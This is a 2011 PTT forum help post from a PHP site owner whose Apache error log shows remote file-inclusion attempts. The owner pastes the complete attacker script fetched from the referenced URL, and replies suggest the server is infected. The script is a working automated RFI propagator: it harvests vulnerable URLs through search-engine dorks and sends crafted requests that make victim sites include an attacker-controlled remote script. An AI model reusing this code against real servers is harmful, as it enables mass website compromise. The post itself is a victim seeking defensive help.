[請益] 網路攻擊?

時間Wed Jun 15 20:59:27 2011

從昨天開始,APACHE的error_log就一直出現以下訊息,一秒一次左右 [Wed Jun 15 20:47:28 2011] [error] [client 187.127.72.193] PHP Notice: Use of undefined constant integer - assumed 'integer' in http://www.fpe.sn/webcam/pesquisadorRFI.txt?/config.php on line 190 http://www.fpe.sn 完全不是我的網址,我也不知道這是那裏 http://www.fpe.sn/webcam/pesquisadorRFI.txt的內容我看了如下 <?php function filterPhpInjection(&$links) { //filter the url until = $buffer = array(); foreach($links as $key => $value) { if(eregi("=",$value)) { preg_match('/[^=]+/',$value,$matches); $buffer[$key] = $matches[0] . "="; } } return $buffer; } function getLinks(&$buffer) { preg_match_all('/href="([^"> ]*)/',$buffer,$matches); foreach($matches[1] as $value) { if(eregi(".",$value) && !preg_match('/(google|orkut|live\.com|cade)/',$value)) { $matches_pure[] = $value; } } unset($matches); unset($buffer); foreach($matches_pure as $key => $value) { if(preg_match('/^\//',$value)) { unset($matches_pure[$key]); } elseif(preg_match('/^http/',$value) == 0 && preg_match('/^https/',$value) == 0) { $matches_pure[$key] = 'http://' . $value; } } $links = array(); foreach($matches_pure as $value) { preg_match('/https?:\/\/[^\/]*/',$value,$first_step); # get content in http://..../ $second_step = preg_split('/https?:\/\/[^\/]*/',$value); # get /.../..../..., the rest of url $host = preg_replace('/https?:\/\//','',$first_step[0]); $url = $second_step[1]; if(eregi("http://|www",$host)) { $links[$host] = $url; } else { unset($host,$url); } } unset($matches_pure); return $links; } function getGoogle($string,$pages=1,$adicional="") { $num = 100; # pega 100 resultados por pagina $start = 0; # inicia do resultado 0 $buffer = ""; do { $buffer .= @file_get_contents ("http://www.google.com.br/search?&q=" . urlencode("allinurl:$string$adicional") . "&num=$num&start=$start"); if($buffer == false) { break 1; } if(eregi("We're sorry...",$buffer)) { break 1; } if($pages > 1) { $start += 100; } sleep(5); } while(--$pages); return $buffer; } function getCade($string,$pages=1,$adicional="") { $num = 100; # pega 100 resultados por pagina $start = 1; # inicia do resultado 0 $end = 1; $buffer = ""; do { $buffer .= @file_get_contents ("http://cade.search.yahoo.com/search?&p=" . urlencode("inurl:$string$adicional") . "&n=$num&start=$start&b=$end"); if($buffer == false) { break 1; } if(eregi("erro 999",$buffer)) { break 1; } if($pages > 1) { $end += 100; } sleep(5); } while(--$pages); return $buffer; } function getLive($string,$pages=1,$adicional="") { $num = 11; # pega 11 resultados por pagina, na verdade são 10 $buffer =""; do { $buffer .= @file_get_contents ("http://search.live.com/results.aspx?q=" . urlencode("$string$adicional") . "&scope=&first=$num"); if($buffer == false) { break 1; } if($pages > 1) { $num += 10; } } while(--$pages); return $buffer; } function gerador() { $num = rand(1,6); $alfabeto = range('a','z'); $str = ''; while($num--) { $n = rand(0,25); $str .= $alfabeto[$n]; } $sites = array('ac','ad','ae','af','ag','ai','al','am','an','ao','aq','ar','as','at','au','aw','ax','az','ba','bb','bd','be','bf','bg','bh','bi','bj','bm','bn','bo','br','bs','bt','bv','bw','by','bz','ca','cc','cd','cf','cg','ch','ci','ck','cl','cm','cn','co','cr','cu','cv','cx','cy','cz','de','dj','dk','dm','do','dz','ec','ee','eg','eh','er','es','et','eu','fi','fj','fk','fm','fo','fr','ga','gb','gd','ge','gf','gg','gh','gi','gl','gm','gn','gp','gq','gr','gs','gt','gu','gw','gy','hk','hm','hn','hr','ht','hu','id' ,'ie','il','im','in','io','iq','ir','is','it','je','jm','jo','jp','ke','kg','kh','ki','km','kn','kp','kr','kw','ky','kz','la','lb','lc','li','lk','lr','lr','ls','lt','lu','lv','ly','ma','mc','md','me','mg','mh','mk','ml','mm','mn','mo','mp','mq','mr','ms','mt','mu','mv','mw','mx','my','mz','na','nc','ne','nf','ng','ni','nl','no','np','nr','nu','nz','nc.tr','om','pa','pe','pf','pg','ph','pk','pl','pm','pn','pr','ps','pt','pw','py','qa','re','ro','rs','ru','rw','sa','sb','sc','sd','se','sg','sh','si','sj',' sk','sl','sm','sn','so','sr','st','su','sv','sy','sz','tc','td','tf','tg','th','tj','tk','tl','tm','tn','to','tp','tr','tt','tv','tw','tz','ua','ug','uk','us','uy','uz','va','vc','ve','vg','vi','vn','vu','wf','ws','ye','yt','yu','za','zm','zw'); return '.php?' . $str . "= site:" . $sites[rand(0,250)]; //return ".php?$str="; } if(isset($_GET['para']) && isset($_GET['tempo']) && isset($_GET['checador']) && isset($_GET['enviador']) ): ignore_user_abort(false); set_time_limit(0); define("NEWLINE","<br />"); define("CHECADOR",$_GET['checador'] . '?servidor='); define("ENVIADOR",$_GET['enviador']); $para = $_GET['para']; //para o enviador $tempo = localtime(time(),true); $tempo2 = $tempo['tm_min'] + $_GET['tempo']; while($tempo['tm_min'] < $tempo2) { $value = gerador(); if(isset($_GET['addGoogle'])) $buffer = getGoogle($value,2,' ' . $_GET['addGoogle']); else $buffer = getGoogle($value,2); if(isset($_GET['addCade'])) $buffer .= getCade($value,2,' ' . $_GET['addCade']); else $buffer .= getCade($value); if(isset($_GET['addLive'])) $buffer .= getLive($value,10,' ' .$_GET['addLive']); else $buffer .= getLive($value,10); $buffer = getLinks($buffer); $buffer = filterPhpInjection($buffer); foreach($buffer as $chave => $valor) { if(eregi("http://",$chave)) $chave = str_replace("http://", "", $chave); if(!eregi("www.",$chave)) $chave = "www." . $chave; $checa = @file_get_contents(CHECADOR . $chave); if(eregi("verdade",$checa)) continue 1; $url = $chave . $valor; $inc = ENVIADOR; $get = $valor . $inc . "?&servidor=$url&para=$para"; $header = "GET $get HTTP/1.1 \r\n"; $header .= "Host: $chave \r\n\r\n"; $sk = @socket_create(AF_INET,SOCK_STREAM,SOL_TCP); $conn = @socket_connect($sk, $chave, 80); @socket_write($sk,$header,strlen($header)); if(gettype($tempo['tm_min']/20) == integer) { mail($para,"máquina $chave pesquisando..."); } } $tempo = localtime(time(),true); } endif; ?> 請問我要怎麼阻止這個訊息一直出現T-T 求求大家幫幫忙 -- 女人會愛上讓她哭的男人,卻嫁給讓她笑的男人男人會愛上讓他笑的女人,卻娶了讓他哭的女人 --

※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 218.167.187.241

1^F：→ arrack:是你中毒了.. 06/15 21:02

2^F：→ arrack:搜尋原始碼看看有沒有那個網址 06/15 21:04

3^F：→ september02:我找過檔案和MYSQL了,都沒有發現可疑的東西... 06/16 12:43

4^F：→ averywu:PHP是SERVER端的東西，應該是你的CODE裡有東西了 06/16 16:33

5^F：→ arrack:有時候病毒會加密，你可以從檔案最後修改日期去著手查詢 06/16 20:24

6^F：→ arrack:我個人處理過很多次這類的情形... 06/16 20:24

7^F：→ arrack:尤其是舊版的opensource套裝軟體，如osc... 06/16 20:25

	[問題/行為] 貓晚上進房間會不會有憋尿問題
	Re: [閒聊] 選了錯誤的女孩成為魔法少女 XDDDDDDDDDD
	[正妹] 瑞典一張
	[心得] EMS高領長版毛衣.墨小樓MC1002
	[分享] 丹龍隔熱紙GE55+33+22
	[問題] 清洗洗衣機
	[尋物] 窗台下的空間
	[閒聊] 双極の女神1 木魔爵
	[售車] 新竹 1997 march 1297cc 白色四門
	[討論] 能從照片感受到攝影者心情嗎
	[狂賀] 賀賀賀賀賀！島村卯月！總選舉NO.1
	[難過] 羨慕白皮膚的女生
	閱讀文章
	[黑特]
	[問題] SBK S1安裝於安全帽位置
	[分享] 舊woo100絕版開箱!!
	Re: [無言] 關於小包衛生紙
	[開箱] E5-2683V3 RX480Strix 快睿C1 簡單測試
	[心得] 蒼の海賊龍地獄執行者16PT
	[售車] 1999年Virage iO 1.8EXi
	[心得] 挑戰33 LV10 獅子座pt solo
	[閒聊] 手把手教你不被桶之新手主購教學
	[分享] Civic Type R 量產版官方照無預警流出
	[售車] Golf 4 2.0 銀色自排
	[出售] Graco提籃汽座（有底座）2000元誠可議
	[問題] 請問補牙材質掉了還能再補嗎?(台中半年內
	[問題] 44th 單曲生寫竟然都給重複的啊啊！
	[心得] 華南紅卡/icash 核卡
	[問題] 拔牙矯正這樣正常嗎
	[贈送] 老莫高業初業 102年版
	[情報] 三大行動支付本季掀戰火
	[寶寶] 博客來Amos水蠟筆5/1特價五折
	Re: [心得] 新鮮人一些面試分享
	[心得] 蒼の海賊龍地獄麒麟25PT
	Re: [閒聊] (君の名は。雷慎入) 君名二創漫畫翻譯
	Re: [閒聊] OGN中場影片：失蹤人口局 (英文字幕)
	[問題] 台灣大哥大4G訊號差
	[出售] [全國]全新千尋侘草LED燈, 水草

WEB批踢踢(PTT)

PHP 板

[請益] 網路攻擊?

熱門看板

贊助商連結